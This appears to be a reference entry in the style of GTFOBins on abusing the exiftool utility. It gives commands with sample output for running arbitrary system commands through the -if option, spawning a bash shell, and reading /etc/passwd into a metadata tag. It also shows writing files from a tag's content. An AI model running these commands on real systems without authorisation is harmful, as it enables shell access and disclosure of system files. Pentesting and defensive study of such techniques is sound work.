Add more exiftool commands

[zerodivisi0n]

Run system command:

$ COMMAND=id
$ INPUT=sample.pdf
$ exiftool -if "system('$COMMAND');1" --filename INPUT
uid=0(root) gid=0(root) groups=0(root)
ExifTool Version Number         : 12.76

Run system command and exfiltrate result via metadata tags:

$ COMMAND=id
$ INPUT=sample.pdf
$ exiftool -userparam "inj=Test" -if "\$\$self{OPTIONS}{UserParam}{inj}=\`$COMMAND\`;1" '-description<$inj' --filename $INPUT
    1 image files updated
$ exiftool $INPUT | grep -i "description  "
Description                     : uid=0(root) gid=0(root) groups=0(root).

Spawn an interactive system shell:

$ INPUT=sample.pdf
$ exiftool -if "system('bash')" $INPUT
$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   4296  3456 pts/0    Ss   11:16   0:00 /bin/bash
root       348  3.2  0.3  32008 29184 pts/0    S    11:18   0:00 /usr/bin/perl -w /usr/bin/exiftool -if system('bash') file
root       349  0.0  0.0   4296  3584 pts/0    S    11:18   0:00 bash
root       352  0.0  0.0   7628  3456 pts/0    R+   11:18   0:00 ps aux

Exfiltrate file data via metadata tags:

$ LFILE=/etc/passwd
$ INPUT=sample.pdf
$ exiftool "-description<=$LFILE" --filename $INPUT
$ exiftool sample.pdf | grep "Description  "
Description                     : root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin...

Write file from metadata tag's content:

$ LFILE=outfile
$ INPUT=input_file
$ exiftool '-description=FILE DATA' sample.pdf # prepare data to write
$ exiftool -description -W $LFILE --filename $INPUT
$ cat $LFILE
Description                     : FILE DATA